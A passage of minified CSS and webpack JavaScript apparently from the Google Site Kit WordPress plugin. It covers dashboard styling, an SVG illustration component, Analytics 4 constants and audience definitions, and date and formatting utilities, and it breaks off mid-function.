.googlesitekit-data-block__value,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__value,.googlesitekit-data-block #wpadminbar .googlesitekit-adminbar .googlesitekit-data-block__value,.googlesitekit-data-block .googlesitekit-data-block__suffix,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__suffix{color:#6c726e;display:inline-block;font-size:12px;font-weight:500;letter-spacing:.2px;line-height:1.33;text-transform:none}.googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__value,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__value,.googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__suffix,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__suffix{font-size:16px;font-weight:400;letter-spacing:.5px}.googlesitekit-data-block .googlesitekit-data-block__value--up,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__value--up,.googlesitekit-data-block .googlesitekit-data-block__suffix--up,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__suffix--up{color:var(--color-up)}.googlesitekit-data-block .googlesitekit-data-block__value--down,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__value--down,.googlesitekit-data-block .googlesitekit-data-block__suffix--down,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__suffix--down{color:var(--color-down)}.googlesitekit-data-block .googlesitekit-data-block__source,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__source{font-size:12px;letter-spacing:.2px;margin-top:8px}@media(min-width: 960px){.googlesitekit-data-block .googlesitekit-data-block__source,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__source{margin-top:12px}}.googlesitekit-data-block--button .googlesitekit-data-block__sparkline,.googlesitekit-data-block--button #wpadminbar .googlesitekit-adminbar .googlesitekit-data-block__sparkline,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block--button .googlesitekit-data-block__sparkline{margin:8px auto 0 auto}.googlesitekit-data-block--button{cursor:pointer;display:flex;flex-direction:column;height:100%;justify-content:flex-end;padding-bottom:16px;padding-top:20px;text-align:center;transition:background-color .2s ease-in-out}@media(min-width: 960px){.googlesitekit-data-block--button{padding-bottom:24px;padding-top:28px}}.googlesitekit-data-block--button::before{content:"";height:4px;left:0;opacity:0;position:absolute;right:0;top:0;transition:opacity .2s ease-in-out}.googlesitekit-data-block--selected::before{opacity:1}.googlesitekit-data-block--button-1:not(.googlesitekit-data-block--is-gathering-data):hover,.googlesitekit-data-block--button-1:not(.googlesitekit-data-block--is-gathering-data):focus,.googlesitekit-data-block--button-1:not(.googlesitekit-data-block--is-gathering-data):active{background-color:rgba(99,128,184,.1)}.googlesitekit-data-block--button-1.googlesitekit-data-block--is-gathering-data::before{background-color:#999f9b}.googlesitekit-data-block--button-1.googlesitekit-data-block--is-gathering-data.googlesitekit-data-block--selected::before{opacity:.6}.googlesitekit-data-block--button-1::before{background-color:#6380b8}.googlesitekit-data-block--button-2:not(.googlesitekit-data-block--is-gathering-data):hover,.googlesitekit-data-block--button-2:not(.googlesitekit-data-block--is-gathering-data):focus,.googlesitekit-data-block--button-2:not(.googlesitekit-data-block--is-gathering-data):active{background-color:rgba(75,187,187,.1)}.googlesitekit-data-block--button-2.googlesitekit-data-block--is-gathering-data::before{background-color:#999f9b}.googlesitekit-data-block--button-2.googlesitekit-data-block--is-gathering-data.googlesitekit-data-block--selected::before{opacity:.6}.googlesitekit-data-block--button-2::before{background-color:#4bbbbb}.googlesitekit-data-block--button-3:not(.googlesitekit-data-block--is-gathering-data):hover,.googlesitekit-data-block--button-3:not(.googlesitekit-data-block--is-gathering-data):focus,.googlesitekit-data-block--button-3:not(.googlesitekit-data-block--is-gathering-data):active{background-color:rgba(92,146,113,.1)}.googlesitekit-data-block--button-3.googlesitekit-data-block--is-gathering-data::before{background-color:#999f9b}.googlesitekit-data-block--button-3.googlesitekit-data-block--is-gathering-data.googlesitekit-data-block--selected::before{opacity:.6}.googlesitekit-data-block--button-3::before{background-color:#5c9271}.googlesitekit-data-block--button-4:not(.googlesitekit-data-block--is-gathering-data):hover,.googlesitekit-data-block--button-4:not(.googlesitekit-data-block--is-gathering-data):focus,.googlesitekit-data-block--button-4:not(.googlesitekit-data-block--is-gathering-data):active{background-color:rgba(110,72,171,.1)}.googlesitekit-data-block--button-4.googlesitekit-data-block--is-gathering-data::before{background-color:#999f9b}.googlesitekit-data-block--button-4.googlesitekit-data-block--is-gathering-data.googlesitekit-data-block--selected::before{opacity:.6}.googlesitekit-data-block--button-4::before{background-color:#6e48ab}.googlesitekit-plugin .googlesitekit-data-block__loading{align-items:center;display:flex;flex-direction:row}.googlesitekit-plugin .googlesitekit-data-block--is-gathering-data{cursor:auto}.googlesitekit-error-text{color:#ac4220;font-weight:500}.googlesitekit-error-retry-text{color:#ac4220;margin-left:1rem}.googlesitekit-report-error-actions{align-items:center;display:flex;flex-wrap:wrap;gap:1rem}.googlesitekit-plugin .googlesitekit-gathering-data-notice{text-transform:lowercase}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-small span{color:#6c726e;display:block;font-size:28px;line-height:1.286;padding:0}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-small span{font-size:12px;letter-spacing:.2px;line-height:1.33;padding:0}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-default{position:relative;text-align:inherit}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-default span{color:#6c726e;display:block;font-size:28px;line-height:1.286;padding:0}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-overlay{align-items:center;display:flex;height:100%;justify-content:center;left:0;position:absolute;top:0;width:100%}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-overlay span{color:#6c726e;display:block;font-size:28px;line-height:1.286;padding:0}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-small-overlay{align-items:center;display:flex;height:100%;justify-content:center;left:0;position:absolute;top:0;width:100%}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-small-overlay span{color:#6c726e;display:block;font-size:28px;line-height:1.286;padding:0}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-small-overlay span{font-size:18px;line-height:1.33;max-width:80px;padding:0;text-align:center}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-large span{color:#6c726e;display:block;font-size:28px;line-height:1.286;padding:0}#wpadminbar .googlesitekit-plugin .googlesitekit-gathering-data-notice span{color:#999f9b;font-size:12px;letter-spacing:.2px;line-height:1.33;text-transform:lowercase}.googlesitekit-plugin .googlesitekit-icon-wrapper{align-items:center;display:inline-flex}.googlesitekit-preview-block{display:flex;flex-direction:column}.googlesitekit-preview-block--padding{padding:16px}.googlesitekit-preview-block--padding+.googlesitekit-preview-block--padding{padding-top:0}@media(min-width: 960px){.googlesitekit-preview-block--padding{padding:24px}}.googlesitekit-preview-block__wrapper{animation:googlesitekit-pulse 1s infinite ease-in-out;animation-direction:alternate;flex:1 1 auto}@media(prefers-reduced-motion: reduce){.googlesitekit-preview-block__wrapper{animation:none;background-image:linear-gradient(150deg, rgba(0, 0, 0, 0.05), rgba(0, 0, 0, 0.15))}}.googlesitekit-preview-block__wrapper--circle{border-radius:50%}@keyframes googlesitekit-pulse{0%{background-color:#ebeef0}100%{background-color:#cbd0d3}}.googlesitekit-noscript{background-color:#fff;margin:5px 20px 5px 0}@media(min-width: 600px){.googlesitekit-noscript{padding-left:10px;padding-right:10px}}.googlesitekit-noscript__title{margin:0}.no-js:not([amp-version]) [id^=js-googlesitekit-]{display:none}.googlesitekit-plugin .googlesitekit-font-weight-medium{font-weight:500}.googlesitekit-plugin .googlesitekit-font-weight-bold{font-weight:700 !important} "use strict";(globalThis.__googlesitekit_webpackJsonp=globalThis.__googlesitekit_webpackJsonp||[]).push([[201],{37201:(e,t,l)=>{l.r(t),l.d(t,{default:()=>__WEBPACK_DEFAULT_EXPORT__});var r,c,a,i,h,n,s,m,d,f,o,E,p,v,k,F,x,M,y,D,B,g,W,A,w,u,q,z,H,b,C,_,j,O,V,J,L,R,T,Z,P,G,I,K,N,Q,S,U,X,Y,$=l(63696);function ee(){return ee=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var l=arguments[t];for(var r in l)({}).hasOwnProperty.call(l,r)&&(e[r]=l[r])}return e},ee.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>$.createElement("svg",ee({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 455 281"},e),r||(r=$.createElement("path",{fill:"#F1F3F4",d:"M63 281c34.794 0 63-4.702 63-10.5 0-5.799-28.206-10.5-63-10.5s-63 4.701-63 10.5c0 5.798 28.206 10.5 63 10.5"})),c||(c=$.createElement("path",{fill:"#F9AB00",d:"M119.47 249.471c14.62 0 26.471-4.346 26.471-9.706v-3.53H93v3.53c0 5.36 11.851 9.706 26.47 9.706"})),a||(a=$.createElement("ellipse",{cx:119.47,cy:236.235,fill:"#FDD663",rx:26.471,ry:9.706})),i||(i=$.createElement("path",{fill:"#F9AB00",d:"M119.471 242.411c14.619 0 26.47-4.345 26.47-9.706v-3.529h-52.94v3.529c0 5.361 11.85 9.706 26.47 9.706"})),h||(h=$.createElement("ellipse",{cx:119.471,cy:229.176,fill:"#FDD663",rx:26.471,ry:9.706})),n||(n=$.createElement("path",{fill:"#F9AB00",d:"M119.47 235.352c14.62 0 26.471-4.345 26.471-9.706v-3.529H93v3.529c0 5.361 11.851 9.706 26.47 9.706"})),s||(s=$.createElement("ellipse",{cx:119.47,cy:222.117,fill:"#FDD663",rx:26.471,ry:9.706})),m||(m=$.createElement("path",{fill:"#F9AB00",d:"M119.471 228.294c14.619 0 26.47-4.346 26.47-9.706v-3.529h-52.94v3.529c0 5.36 11.85 9.706 26.47 9.706"})),d||(d=$.createElement("ellipse",{cx:119.471,cy:215.059,fill:"#FDD663",rx:26.471,ry:9.706})),f||(f=$.createElement("path",{fill:"#F9AB00",d:"M119.471 221.234c14.619 0 26.47-4.346 26.47-9.706v-3.529h-52.94v3.529c0 5.36 11.85 9.706 26.47 9.706"})),o||(o=$.createElement("ellipse",{cx:119.471,cy:207.999,fill:"#FDD663",rx:26.471,ry:9.706})),E||(E=$.createElement("path",{fill:"#F9AB00",d:"M119.47 214.176c14.62 0 26.471-4.345 26.471-9.705v-3.53H93v3.53c0 5.36 11.851 9.705 26.47 9.705"})),p||(p=$.createElement("ellipse",{cx:119.471,cy:200.941,fill:"#FDD663",rx:26.471,ry:9.706})),v||(v=$.createElement("path",{fill:"#F29900",d:"M118.669 204v-.591a5.6 5.6 0 0 1-1.11-.19 3.6 3.6 0 0 1-.948-.421 1.75 1.75 0 0 1-.611-.658l1.172-.258q.15.299.549.536.413.238.948.306v-1.507l-.037-.014q-.998-.203-1.647-.529-.648-.333-.648-.848 0-.306.274-.577.287-.272.811-.448a4.4 4.4 0 0 1 1.247-.218V198h.998v.597q.649.054 1.086.21.449.15.698.347.262.196.362.373l-1.148.271a1.1 1.1 0 0 0-.349-.298q-.237-.15-.649-.224v1.425q.674.15 1.198.333.524.176.823.427a.75.75 0 0 1 .312.611q0 .4-.337.679-.324.278-.861.441a5 5 0 0 1-1.135.21V204zm-1.047-4.174q0 .217.262.366.273.143.785.278v-1.221a2.2 2.2 0 0 0-.761.21q-.286.156-.286.367m3.081 2.253q0-.23-.275-.373a3.5 3.5 0 0 0-.761-.272v1.283q.45-.061.736-.224.3-.164.3-.414"})),k||(k=$.createElement("path",{stroke:"#F9AB00",strokeWidth:2,d:"M141.412 200.941c0 .675-.393 1.463-1.436 2.317-1.036.848-2.595 1.656-4.611 2.353-4.021 1.392-9.64 2.271-15.894 2.271-6.255 0-11.874-.879-15.895-2.271-2.015-.697-3.575-1.505-4.61-2.353-1.043-.854-1.437-1.642-1.437-2.317s.394-1.464 1.437-2.317c1.035-.848 2.595-1.656 4.61-2.353 4.021-1.392 9.64-2.271 15.895-2.271s11.873.879 15.894 2.271c2.016.697 3.575 1.505 4.611 2.353 1.043.853 1.436 1.642 1.436 2.317Z"})),F||(F=$.createElement("rect",{width:292.941,height:200.008,x:123,y:51.824,fill:"#F1F3F4",rx:8})),x||(x=$.createElement("path",{fill:"#fff",d:"M138.883 92.23h88.892v143.44h-88.892z"})),M||(M=$.createElement("circle",{cx:163.126,cy:116.473,r:12.122,fill:"#D9DBDF"})),y||(y=$.createElement("path",{fill:"#D9DBDF",d:"M164.438 150.312 146.964 169h72.73l-26.448-28.284-18.89 20.202z"})),D||(D=$.createElement("rect",{width:32.325,height:16.162,x:167.166,y:211.426,fill:"#639AF8",rx:8.081})),B||(B=$.createElement("path",{fill:"#E7E9EC",fillRule:"evenodd",d:"M219.694 190.457h-72.73v-10.589h72.73zm0 12.632h-72.73v-3.53h72.73z",clipRule:"evenodd"})),g||(g=$.createElement("path",{fill:"#3C4043",d:"M123 59.824a8 8 0 0 1 8-8h276.941a8 8 0 0 1 8 8v16.243H123z"})),W||(W=$.createElement("rect",{width:8.081,height:8.081,x:135.122,y:59.904,fill:"#fff",rx:4.041})),A||(A=$.createElement("rect",{width:8.081,height:8.081,x:147.244,y:59.904,fill:"#fff",rx:4.041})),w||(w=$.createElement("rect",{width:8.081,height:8.081,x:159,y:59.904,fill:"#fff",rx:4.041})),u||(u=$.createElement("path",{fill:"#fff",d:"M251.824 92.23h142.43v48.487h-142.43z"})),q||(q=$.createElement("path",{fill:"#E6E8EB",d:"M251.824 156.879h105.055v16.162H251.824zm0 24.242h123.237v4.041H251.824zm0 12.123h105.055v4.041H251.824zm0 12.121h142.43v4.041h-142.43z"})),z||(z=$.createElement("path",{stroke:"#C5221F",strokeWidth:4,d:"M62.118 214.177 60.38 221.5l-5.308 22.368-5.307 22.367H33"})),H||(H=$.createElement("path",{stroke:"#B31412",strokeWidth:4,d:"M62.118 214.176 60.38 221.5"})),b||(b=$.createElement("path",{stroke:"#C5221F",strokeWidth:4,d:"m81.53 214.177 6.176 15-10.588 37.058h15"})),C||(C=$.createElement("path",{stroke:"#B31412",strokeWidth:4,d:"m81.53 214.176 3.088 7.5"})),_||(_=$.createElement("path",{stroke:"#E94235",strokeLinejoin:"round",strokeWidth:4,d:"M111.412 184.576c7.157.828 36.234 7.419 28.459-18.151l6.835-1.66"})),j||(j=$.createElement("path",{stroke:"#E94235",strokeMiterlimit:10,strokeWidth:4,d:"M37.662 185.927c.868 11.581 1.05 24.942-2.262 36.106"})),O||(O=$.createElement("circle",{cx:73.588,cy:178.882,r:38.824,fill:"#D93025"})),V||(V=$.createElement("path",{stroke:"#fff",strokeMiterlimit:10,strokeWidth:4,d:"M85.941 193c-5.771 7.852-16.52 10.425-24.706 1.069"})),J||(J=$.createElement("path",{fill:"#F9AB00",d:"M424.765 258.293c14.619 0 26.47-4.345 26.47-9.706v-3.529h-52.941v3.529c0 5.361 11.851 9.706 26.471 9.706"})),L||(L=$.createElement("ellipse",{cx:424.765,cy:245.058,fill:"#FDD663",rx:26.471,ry:9.706})),R||(R=$.createElement("path",{fill:"#F9AB00",d:"M428.294 249.471c14.619 0 26.471-4.346 26.471-9.706v-3.53h-52.941v3.53c0 5.36 11.851 9.706 26.47 9.706"})),T||(T=$.createElement("ellipse",{cx:428.294,cy:236.235,fill:"#FDD663",rx:26.471,ry:9.706})),Z||(Z=$.createElement("path",{fill:"#F9AB00",d:"M423 242.411c14.619 0 26.471-4.345 26.471-9.705v-3.53H396.53v3.53c0 5.36 11.851 9.705 26.47 9.705"})),P||(P=$.createElement("ellipse",{cx:423,cy:229.176,fill:"#FDD663",rx:26.471,ry:9.706})),G||(G=$.createElement("path",{stroke:"#F9AB00",strokeWidth:2,d:"M444.941 229.177c0 .674-.393 1.463-1.436 2.317-1.036.847-2.595 1.655-4.61 2.353-4.021 1.392-9.641 2.271-15.895 2.271s-11.874-.879-15.895-2.271c-2.015-.698-3.574-1.506-4.61-2.353-1.043-.854-1.436-1.643-1.436-2.317s.393-1.464 1.436-2.318c1.036-.847 2.595-1.655 4.61-2.353 4.021-1.392 9.641-2.271 15.895-2.271s11.874.879 15.895 2.271c2.015.698 3.574 1.506 4.61 2.353 1.043.854 1.436 1.643 1.436 2.318Z"})),I||(I=$.createElement("path",{stroke:"#1967D2",strokeWidth:4,d:"m190.059 51.824 6.301 7.088a3 3 0 0 1 .758 1.993V80.06h10.588"})),K||(K=$.createElement("path",{stroke:"#185ABC",strokeWidth:4,d:"M190.059 51.824 195 57.499"})),N||(N=$.createElement("path",{stroke:"#1967D2",strokeWidth:4,d:"m207.706 49.058 6.048 6.805a4 4 0 0 1 1.011 2.657v18.773h10.588"})),Q||(Q=$.createElement("path",{stroke:"#185ABC",strokeWidth:4,d:"m207.706 49.058 3.529 3.97"})),S||(S=$.createElement("path",{stroke:"#4285F4",strokeMiterlimit:10,strokeWidth:4,d:"M230.647 26.458c15.346 3.878 28.408-9.969 26.233-25.117q-.048-.348-.114-.694"})),U||(U=$.createElement("path",{stroke:"#4285F4",strokeLinejoin:"round",strokeWidth:4,d:"m130.059 32.7.549-.13a6.33 6.33 0 0 1 3.775.299c1.189.481 2.177 1.313 2.811 2.367 3.157 5.17 7.698 8.75 14.807 9.43 5.087.487 11.596-.803 15.117-4.53"})),X||(X=$.createElement("path",{fill:"#1A73E8",d:"M204.078 51.725c20.711-5.55 33.002-26.838 27.453-47.55l-75.002 20.097c5.55 20.711 26.838 33.002 47.549 27.453"})),Y||(Y=$.createElement("path",{stroke:"#fff",strokeMiterlimit:10,strokeWidth:4,d:"M206.515 33.52a20 20 0 0 1-2.436 1.853 18 18 0 0 1-3.224 1.662 16.9 16.9 0 0 1-7.035 1.148 18.5 18.5 0 0 1-2.589-.314"})))}}]);"use strict";(globalThis.__googlesitekit_webpackJsonp=globalThis.__googlesitekit_webpackJsonp||[]).push([[300],{80:(e,t,i)=>{i.d(t,{CV:()=>C,Cu:()=>v,K9:()=>o,Kr:()=>I,Lf:()=>p,Oh:()=>r,PW:()=>A,Rx:()=>_,S9:()=>y,TQ:()=>d,Vt:()=>T,Wl:()=>k,ZC:()=>s,ZY:()=>a,_p:()=>w,ag:()=>m,aj:()=>u,bz:()=>x,dq:()=>D,f2:()=>c,fB:()=>N,fV:()=>b,iB:()=>g,kc:()=>l,mo:()=>f,nc:()=>S,rm:()=>j,to:()=>n,wo:()=>h,yn:()=>M});const o="modules/analytics-4",s="account_create",n="property_create",r="webdatastream_create",a="analyticsSetup",l=10,c=0,g="https://www.googleapis.com/auth/tagmanager.readonly",d="enhanced-measurement-form",u="enhanced-measurement-enabled",p="enhanced-measurement-should-dismiss-activation-banner",m="analyticsAccountCreate",I="analyticsCustomDimensionsCreate",y="https://www.googleapis.com/auth/analytics.edit",h="dashboardAllTrafficWidgetDimensionName",f="dashboardAllTrafficWidgetDimensionColor",M="dashboardAllTrafficWidgetDimensionValue",k="dashboardAllTrafficWidgetActiveRowIndex",j="dashboardAllTrafficWidgetLoaded",v={googlesitekit_post_date:{parameterName:"googlesitekit_post_date",displayName:"WordPress Post Date",description:"Created by Site Kit: Date when a post was published",scope:"EVENT"},googlesitekit_post_author:{parameterName:"googlesitekit_post_author",displayName:"WordPress Post Author",description:"Created by Site Kit: WordPress name of the post author",scope:"EVENT"},googlesitekit_post_categories:{parameterName:"googlesitekit_post_categories",displayName:"WordPress Post Categories",description:"Created by Site Kit: Names of categories assigned to a post",scope:"EVENT"},googlesitekit_post_type:{parameterName:"googlesitekit_post_type",displayName:"WordPress Post Type",description:"Created by Site Kit: Content type of a post",scope:"EVENT"}},S={ADD_TO_CART:"add_to_cart",PURCHASE:"purchase",SUBMIT_LEAD_FORM:"submit_lead_form",GENERATE_LEAD:"generate_lead",CONTACT:"contact"},b=[S.CONTACT,S.GENERATE_LEAD,S.SUBMIT_LEAD_FORM],N={"new-visitors":{description:"People who visited the site for the first time",displayName:"New visitors",membershipDurationDays:-1,filterClauses:[{clauseType:"INCLUDE",simpleFilter:{scope:"AUDIENCE_FILTER_SCOPE_ACROSS_ALL_SESSIONS",filterExpression:{andGroup:{filterExpressions:[{orGroup:{filterExpressions:[{dimensionOrMetricFilter:{fieldName:"newVsReturning",stringFilter:{matchType:"EXACT",value:"new"}}}]}},{orGroup:{filterExpressions:[{notExpression:{dimensionOrMetricFilter:{fieldName:"groupId",stringFilter:{matchType:"EXACT",value:"created_by_googlesitekit:new_visitors"}}}}]}}]}}}}]},"returning-visitors":{description:"People who have visited your site at least once before",displayName:"Returning visitors",membershipDurationDays:-1,filterClauses:[{clauseType:"INCLUDE",simpleFilter:{scope:"AUDIENCE_FILTER_SCOPE_ACROSS_ALL_SESSIONS",filterExpression:{andGroup:{filterExpressions:[{orGroup:{filterExpressions:[{dimensionOrMetricFilter:{fieldName:"newVsReturning",stringFilter:{matchType:"EXACT",value:"returning"}}}]}},{orGroup:{filterExpressions:[{notExpression:{dimensionOrMetricFilter:{fieldName:"groupId",stringFilter:{matchType:"EXACT",value:"created_by_googlesitekit:returning_visitors"}}}}]}}]}}}}]}},A="audiencePermissionsSetup",C="audienceTileCustomDimensionCreate",x="audience-selection-panel-expirable-new-badge-",D="audience",T="customDimension",w="property",_=[D,T,w]},3170:(e,t,i)=>{i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var o,s=i(63696);function n(){return n=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var o in i)({}).hasOwnProperty.call(i,o)&&(e[o]=i[o])}return e},n.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>s.createElement("svg",n({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 22 19"},e),o||(o=s.createElement("path",{fill:"currentColor",d:"M0 19h22L11 0zm12-3h-2v-2h2zm0-4h-2V8h2z"})))},4751:(e,t,i)=>{i.d(t,{A:()=>c});var o=i(62688),s=i.n(o),n=i(4452),r=i.n(n),a=i(97513),l=i(62540);function PreviewBlock({className:e,width:t,height:i,shape:o,padding:s,smallWidth:n,smallHeight:c,tabletWidth:g,tabletHeight:d,desktopWidth:u,desktopHeight:p}){const m=(0,a.dv)(),I={width:{[a.mp]:n,[a.Lg]:g,[a.Fo]:u,[a.Qb]:u},height:{[a.mp]:c,[a.Lg]:d,[a.Fo]:p,[a.Qb]:u}};return(0,l.jsx)("div",{className:r()("googlesitekit-preview-block",e,{"googlesitekit-preview-block--padding":s}),style:{width:I.width[m]||t,height:I.height[m]||i},children:(0,l.jsx)("div",{className:r()("googlesitekit-preview-block__wrapper",{"googlesitekit-preview-block__wrapper--circle":"circular"===o})})})}PreviewBlock.propTypes={className:s().string,width:s().string,height:s().string,shape:s().string,padding:s().bool,smallWidth:s().string,smallHeight:s().string,tabletWidth:s().string,tabletHeight:s().string,desktopWidth:s().string,desktopHeight:s().string},PreviewBlock.defaultProps={className:void 0,width:"100px",height:"100px",shape:"square",padding:!1,smallWidth:void 0,smallHeight:void 0,tabletWidth:void 0,tabletHeight:void 0,desktopWidth:void 0,desktopHeight:void 0};const c=PreviewBlock},5855:(e,t,i)=>{i.d(t,{A:()=>g});var o=i(4452),s=i.n(o),n=i(62688),r=i.n(n),a=i(63696),l=i(62540);const c=(0,a.forwardRef)(({label:e,className:t,hasLeftSpacing:i=!1,...o},n)=>(0,l.jsx)("span",{ref:n,...o,className:s()("googlesitekit-badge",t,{"googlesitekit-badge--has-left-spacing":i}),children:e}));c.displayName="Badge",c.propTypes={label:r().string.isRequired,hasLeftSpacing:r().bool};const g=c},6109:(e,t,i)=>{i.d(t,{tt:()=>N,Jg:()=>b,Gp:()=>v,GH:()=>j,r0:()=>S,Du:()=>A,Zf:()=>H,Cn:()=>G,G7:()=>y,vH:()=>I,N_:()=>E,zh:()=>Q,mK:()=>g.mK,Ql:()=>C,vY:()=>O,sq:()=>D,VZ:()=>z.VZ,JK:()=>g.JK,IS:()=>w,pH:()=>z.pH,kf:()=>U,O5:()=>_,Qr:()=>x,x6:()=>Z,K5:()=>g.K5,S_:()=>m,dc:()=>z.dc,Eo:()=>g.Eo,jq:()=>g.jq,DK:()=>B.D,N9:()=>W,p9:()=>n.p,XH:()=>T,Zm:()=>l,sx:()=>s.sx,BI:()=>s.BI,CZ:()=>n.C,BG:()=>Y});var o=i(17243),s=i(65054),n=i(50477),r=i(10523),a=i.n(r);function l(e){return a()(JSON.stringify(c(e)))}function c(e){const t={};return Object.keys(e).sort().forEach(i=>{let o=e[i];o&&"object"==typeof o&&!Array.isArray(o)&&(o=c(o)),t[i]=o}),t}var g=i(49746);function d(e){return e.replace(new RegExp("\\[([^\\]]+)\\]\\((https?://[^/]+\\.\\w+/?.*?)\\)","gi"),'<a href="$2" target="_blank" rel="noopener noreferrer">$1</a>')}function u(e){return`<p>${e.replace(/\n{2,}/g,"</p><p>")}</p>`}function p(e){return e.replace(/\n/gi,"<br>")}function m(e){const t=[d,u,p];let i=e;for(const e of t)i=e(i);return i}function I(e){return e=parseFloat(e),isNaN(e)||0===e?[0,0,0,0]:[Math.floor(e/60/60),Math.floor(e/60%60),Math.floor(e%60),Math.floor(1e3*e)-1e3*Math.floor(e)]}function y(e){const t=e&&!Number.isInteger(e)?new Date(e).getTime():e;return isNaN(t)||!t?0:t}var h=i(32091),f=i.n(h),M=i(82871);const k="Date param must construct to a valid date instance or be a valid date instance itself.",j="Invalid dateString parameter, it must be a string.",v='Invalid date range, it must be a string with the format "last-x-days".',S=60,b=60*S,N=24*b,A=7*N;function C(){function e(e){return(0,M.sprintf)(/* translators: %s: number of days */ /* translators: %s: number of days */ (0,M._n)("Last %s day","Last %s days",e,"google-site-kit"),e)}return{"last-7-days":{slug:"last-7-days",label:e(7),days:7},"last-14-days":{slug:"last-14-days",label:e(14),days:14},"last-28-days":{slug:"last-28-days",label:e(28),days:28},"last-90-days":{slug:"last-90-days",label:e(90),days:90}}}function x(e=""){if(!(0,o.isString)(e))return!1;if(3!==e.split("-").length)return!1;const t=new Date(e);return(0,o.isDate)(t)&&!isNaN(t)}function D(e){f()((0,o.isDate)(e)&&!isNaN(e),k);const t=`${e.getMonth()+1}`,i=`${e.getDate()}`;return[e.getFullYear(),t.length<2?`0${t}`:t,i.length<2?`0${i}`:i].join("-")}function T(e){f()(x(e),j);const[t,i,o]=e.split("-");return new Date(t,i-1,o)}function w(e,t){return D(E(e,t*N))}function _(e){const t=e.split("-");return 3===t.length&&"last"===t[0]&&!Number.isNaN(t[1])&&!Number.isNaN(parseFloat(t[1]))&&"days"===t[2]}function E(e,t){f()(x(e)||(0,o.isDate)(e)&&!isNaN(e),j);const i=x(e)?Date.parse(e):e.getTime();return new Date(i-1e3*t)}var R=i(78159),L=i(38017),P=i(62540);function O(e,t={}){if(Number.isNaN(Number(e)))return"";const{invertColor:i=!1}=t;return(0,R.Ay)((0,P.jsx)(L.A,{direction:e>0?"up":"down",invertColor:i}))}function G(e,t){return e>0&&t>0?e/t-1:e>0?1:t>0?-1:0}var z=i(48276);function Z(e){const t=parseFloat(e)||0;return!!Number.isInteger(t)&&t>0}function U(e){if("number"==typeof e)return!0;const t=(e||"").toString();return!!t&&!isNaN(t)}function W(e){return Array.isArray(e)?[...e].sort():e}var B=i(11193);function H(e,t){function i(e){return"0"===e||0===e}if(i(e)&&i(t))return 0;if(i(e)||Number.isNaN(e))return null;const o=(t-e)/e;return Number.isNaN(o)||!Number.isFinite(o)?null:o}function Y(e){try{return JSON.parse(e)&&!!e}catch(e){return!1}}function Q(e){if(!e)return"";const t=e.replace(/&#(\d+);/g,(e,t)=>String.fromCharCode(t)).replace(/(\\)/g,"");return(0,o.unescape)(t)}},7076:(e,t,i)=>{i.d(t,{d:()=>r});var o=i(18117),s=i(17243),n=i(63696);function r(...e){const t=(0,o.MA)(()=>(0,s.debounce)(...e),e);return(0,n.useEffect)(()=>()=>t.cancel(),[t]),t}},7972:(e,t,i)=>{i.d(t,{F:()=>s,n:()=>o});const o="core/ui",s="activeContextID"},8084:(e,t,i)=>{i.d(t,{$C:()=>C,RF:()=>A,WI:()=>b,_5:()=>j,jU:()=>k,o3:()=>M,x0:()=>S});var o=i(32091),s=i.n(o),n=i(50532),r=i.n(n),a=i(17243),l=i(78913);const c="GET_REGISTRY",g="AWAIT";function d(...e){const t=e.reduce((e,t)=>({...e,...t}),{}),i=v(e.reduce((e,t)=>[...e,...Object.keys(t)],[]));return s()(0===i.length,`collect() cannot accept collections with duplicate keys. Your call to collect() contains the following duplicated functions: ${i.join(", ")}. Check your data stores for duplicates.`),t}const u=d,p=d;function m(...e){const t=[...e];let i;return"function"!=typeof t[0]&&(i=t.shift()),(e=i,o={})=>t.reduce((e,t)=>t(e,o),e)}const I=d,y=d,h=d;function f(e){return e}function M(...e){const t=h(...e.map(e=>e.initialState||{}));return{initialState:t,controls:p(...e.map(e=>e.controls||{})),actions:u(...e.map(e=>e.actions||{})),reducer:m(t,...e.map(e=>e.reducer||f)),resolvers:I(...e.map(e=>e.resolvers||{})),selectors:y(...e.map(e=>e.selectors||{}))}}const k={getRegistry:()=>({payload:{},type:c}),*await(e){return{payload:{value:e},type:g}}},j={[c]:(0,l.b)(e=>()=>e),[g]:({payload:e})=>e.value};function v(e){const t=[],i={};for(let o=0;o<e.length;o++){const 